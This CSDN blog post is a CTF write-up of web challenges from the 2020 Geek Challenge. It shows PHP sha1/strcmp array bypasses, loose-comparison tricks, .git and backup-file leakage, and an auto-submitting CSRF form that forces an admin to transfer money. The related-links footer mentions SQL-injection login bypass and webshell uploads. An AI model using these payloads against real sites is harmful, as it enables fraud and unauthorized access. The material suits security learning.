2020极客大挑战web题部分wp

最新推荐文章于 2023-02-08 14:11:13 发布
最新推荐文章于 2023-02-08 14:11:13 发布
阅读量630 收藏 2
点赞数
分类专栏: 刷题 文章标签: 安全 csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45869039/article/details/109142434
版权

可能起点不同吧,对于萌新(我)来说确实是难了点。

web1 welcome

进去是个空白页面,以post方式提交数据,就会看到

<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {
    
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
        show_source(__FILE__);
    }
    else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
        phpinfo();  // collect information from phpinfo!
    }
}

看到源码,如果以get方式,就会出现空白页面。

以post方式提交roam1和roam2

=      //赋值
==     //只比较数值
===   //数值和类型都要比较

我们还要满足roam1和roam2的值不同,但是经过sha1加密的roam1和roam2类型和数值都要相同。

可以利用sha1()函数的漏洞来绕过。如果把这两个字段构造为数组,如:roam1[]=1&&roam2[]=2这样在第一处判断时两数组确实是不同的,但在第二处判断时由于sha1()函数无法处理数组类型,就会给我们返回php的信息。在这里插入图片描述
我们可以找到flag所在的文件,只需要访问就行了。(试了n次也不行)

最后通过抓包
在这里插入图片描述
找到了flag。

web2 flagshop

这道题本来没有做出了,放出来hint也没有做出来,最后请教团队的大佬做出来了。
在这里插入图片描述
先注册一个账号,登陆进去。
在这里插入图片描述
我们需要买flag,但是钱包
在这里插入图片描述
钱包里的前空空如也。

这道题我们主要是通过csrf漏洞,构建一个我们伪造的页面,让后台的管理员给我们转钱。
在这里插入图片描述
第一步就是MD5截断,得到验证码。
第二步在自己的服务器上构造一个转钱页面,在报告上面提交。
构造1.html(这个页面主要内容是通过burp抓包构造csrf poc)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://173.82.206.142:8005/transfer.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="target" value="qidian" />
      <input type="hidden" name="money" value="100000000000000000000000" />
      <input type="hidden" name="messages" value="nihao" />
      <input type="submit" value="Submit request" id="click" />
    </form>
    <script type="text/javascript">
      document.getElementById("click").click();
    </script>
  </body>
</html>

代码内容就是转好多好多钱给奇点。

将url提交。
在这里插入图片描述
在这里插入图片描述
钱来了。

web 3 朋友的学妹

检查页面源代码,得到flag=U1lDe0YxQF80c19oNExwZnVsbGxsbGx9

并且还有提示F12查看源代码,base64是一种常见编码。

将上面的字符的字符解密一下得到flag。

web4 EZWWW

已经有了提示www,在网站后缀加上www.zip,就会下载www.zip文件。

得到了flag文件却不对,看了下index.php的代码。


<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
    //this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

$key2是已知的,我们base64解密就行了,将我们传入的参数等于 $key2,就能得到flag。

web5 EZgit

当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,嘿嘿嘿。。。

给了提示git泄露。

这时候就需要一个神奇了Git Hack(python2环境)了。

python2 GitHack url/.git/

在这里插入图片描述
ls -a 列出隐藏文件

git log 查看记录

在第二行发现了flag,但是没有显示

利用diff参数,查看当前记录,3796是3796466675a1db323e42170def92bee71344a2ee的前四位缩写。

web6 刘壮的黑页

<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
    echo $flag;
}

以不同的方式提交username和passwd。

就可以得到flag。

web7 ezbypass

在这里插入图片描述
a与b通过strcmp函数比较,并且a和b还不能相等。

strcmp ( string $str1 , string $str2 )

参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。

但是这个函数有个漏洞,在5.3之前的php中,如果我们传入非字符串类型的数据的时候,当这个函数接受到了不符合的类型,这个函数将发生错误,但是,显示了报错的警告信息后,将return 0 !也就是虽然报了错,但却判定其相等了。

http://49.234.224.119:7417/?a[]=123&b=nm

这个payload就可以绕过。

在这里插入图片描述
第二步要求我们以POST的方式传入参数C要求其数据类型是非数字变量且还要等于123。

本来以为使用PHP的进制转函数能轻易饶过,但是我错了,应该是php弱类型绕过。

c=123x

就能轻松绕过,吐了吐了吐了!!!

小小奇点呀!
关注
专栏目录
NSSCTF-极客挑战2020-web-wp
F1rstb100d
09-21 648
NSSCTF-极客挑战2020-web-wp
WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 372
0X0000000000000001 审 其实由目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
极客挑战2020wp
Atkx's Blog
11-29 1489
Crypto 二战情报员刘壮 简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.---- 提示:刘壮早上起床打摩丝 提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交 铠甲与萨满 简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm} 提示:kaisa? 偏移量为6时,得到flag MISC 一“页”障目 作者:lingze 简
2020极客挑战WEB部分WP
satasun的博客
11-23 1807
WriteUP Welcome 目地址: http://49.234.224.119:8000/ 目描述: 欢迎来到极客挑战! 访问目链接,发现405报错。 百度了一下,发现是GET或者POST请求出问了。拿Postman试一下: 看了一下需要POST上传一个roam1,roam2,这两个的值不能相等,哈希值要相等,好了,传入数组。 因为各种哈希都无法对数组进行操作,会返回False。然后又因为False === False => True,所以顺利绕过~ 在phpinfo里面找找可以
极客挑战2020部分wp
qq_46041723的博客
11-17 1670
2020极客挑战部分wp前言web一、朋友的学妹二、EZWWW三、刘壮的黑页四、welcome 前言 2020极客挑战开始了。又是一届自闭季。在变菜的路上一去不复返 web 一、朋友的学妹 打开目 发现提示,然后查看控制窗口发现 然后看到base64加密,解密后得到flag。 二、EZWWW 打开目 发现提示网站已经备份,那么就直接御剑扫后台得到 然后打开zip路径得到下载提示,打开 直接放弃文档里的flag。肯定假的。所以打开index.php,发现 <html> <hea
[极客挑战 2020]
qq_62046696的博客
09-18 564
可以看到,他设置了白名单,但我想传一句话木马上去,而且上传成功的话他会告诉你上传的路径,然后再用之前可以传的page参数可以解析伪协议的,但是并不确定是否可以php文件也会被解析,先不想那么多,做来看。坚定了我传木马的决心,这里想到了将php文件打包成zip,改后缀名为jpg,再利用zip伪协议进行读取。整体看下来,要执行check过滤函数,我们就需要执行,waf的else部分,然后过滤掉了php、eval可以用PHP短标签进行绕过,比如。请求方式有误,比如应该用GET请求方式的资源,用了POST。
[2021极客挑战]部分wp
Huamang的博客
11-30 3799
Where_is_my_FUMO 开局是给了一个反弹shell的命令执行 <?php function chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_list, "", $str); } if (isset($_GET['DATA'])) { $data = $_GET['DATA']; $add
[极客挑战 2019]Secret File wp
{OvEr}的博客
11-18 202
[极客挑战 2019]Secret File 这道考察的就是代码审计和PHP伪协议 首先打开页面是这样的 然后我们直接查看源代码 注意到蓝色这一行,背景色是black,而“Oh! You found me”这个字的颜色也是黑色,就将其隐藏了起来,我们改掉它的颜色 页面就出现了这个 点击蓝色那行字 我们就跳转到了这个页面,再点击SECRET试试,当然我觉得不会如此轻易就让我们得到flag呢 ...
CTF学习笔记——[极客挑战 2019]BuyFlag
Obs_cure的博客
02-16 3554
一、[极客挑战 2019]BuyFlag 1.目 2.解步骤 MENU界面下有buyflag的界面,按F12看看 查了一下is_numeric()这个函数,他的作用是判断输入是否是数字的。如果是纯数字返回true,如果不是返回false。这道注释的代码逻辑是要输入一个非纯数字的字符串且等于404,密码才能正确。 然后顺手百度了一下这个函数的漏洞,在这里贴出来: 这个函数和mysql结合起来就容易出问,那是因为is_numeric判断的时候,当碰到16进制数的时候,也会判断成数字 is_num
极客挑战2020_CTF-Web-[极客挑战2019]EasySQL
weixin_39875028的博客
12-06 176
CTF-Web-[极客挑战2019]EasySQL博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challengesWeb类,[极客挑战2019]EasySQL打开目的实例思路目类型是Web类型的,而且是一个登录页面,首先考虑的是...
极客挑战wp部分
weixin_45396639的博客
04-26 377
1.Esay Sql 输入万能密码 2.Http 首先查看源码,发现有一个链接 去那个链接看看 构造http头,Referer:https://www.Sycsecret.com 发送看看,根据提示改user-agent 继续发送,继续根据提示改http头,添加X-Forwarded-For:127.0.0.1 最后,得到flag 3.Secret File 去网页源码看看 去链接...
2020极客挑战web部分复现
re1wn
12-08 6842
2020极客挑战web部分复现
极客挑战2020_极客挑战颁奖典礼
weixin_39665762的博客
12-15 314
2020年12月1日晚,网络空间安全学院三叶草信息安全小组“极客挑战”颁奖典礼在4213教室成功举行。网络空间安全学院党委副书记林细俤、三叶草安全技术小组指导老师吴春旺莅临此次颁奖典礼。 首先,林细俤上台致辞,他对此次极客挑战的举办给予了充分的肯定,并赞扬了三叶草小组对此次活动的组织带头作用。随后,他对获得名次和奖励的队伍和个人进行了肯定和鼓励,希望他们能够再接再...
[极客挑战 2020]Roamphp1-Welcome
m0_62905261的博客
07-30 337
[极客挑战 2020]Roamphp1-Welcome
2020极客挑战】来拼图
_Kisaragi_的博客
11-03 372
目描述 将文件下载下来,打开一看,目给了一张原图: 以及一个装着图片碎片的文件夹,可以看到一些图片上已经有flag的字样了: 看看有多少图片,结果1600张,这也太碎了orz: 那应该就是40×40的切割处理了。 通过观察文件名,好像还挺有规律的,那拿这张图片的文件名来看看,毕竟是flag的开头: 通过尝试不同的解密方式,最终确定这是MD5加密,内容为144: 所以这应该是图片的编号? 那我试试145的MD5: 拿去找找看,结果空空的,啥都没有: 不过
2020第十一届极客挑战——Geek Challenge部分wp
monster663的博客
10-26 4033
比赛正在进行中,本来只剩web没有AK,然后出了一波新,先留一个坑,之后再填
[极客挑战 2020]Greatphp 原生类绕过
qq_54929891的博客
05-10 1051
<?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== s.
2021 极客挑战 web
qq_53263789的博客
02-09 991
前言 拖了老长时间没写wp了,这写的真爽 Dark 给了一个url: http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/ 搜了一下后缀 onion 下一个洋葱浏览器 访问地址即可 Welcome2021 查看源码: <!-- 请使用WELCOME请求方法来请求此网页 --> 一直不理解什么是welcome请求方法 其实就是换个请求方法 Babysql Sqlmap跑一下 Babypop <?p
buuctf-web极客挑战2019)
qq_47804678的博客
02-08 346
于是用bp使用post方式,注意将user=0改成user=1(意思也就是:是cuit的学生为真。一开始我还改成了“cuit's students”。一共就两个页面,就都看一下,发现还有提示:必须是cuit的学生,还得写对密码。如果不加密直接返回的话,flag.php被解析后是看不到有flag的源文件的,所以只能加密然后用在线工具再进行解密得到源文件。bp抓包发现中间302跳转时给了另一个路径secr3t.php,尝试访问,F12找到隐藏的路径.Archive_romm.php,尝试访问,
buuctf web 极客挑战2019
最新发布
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值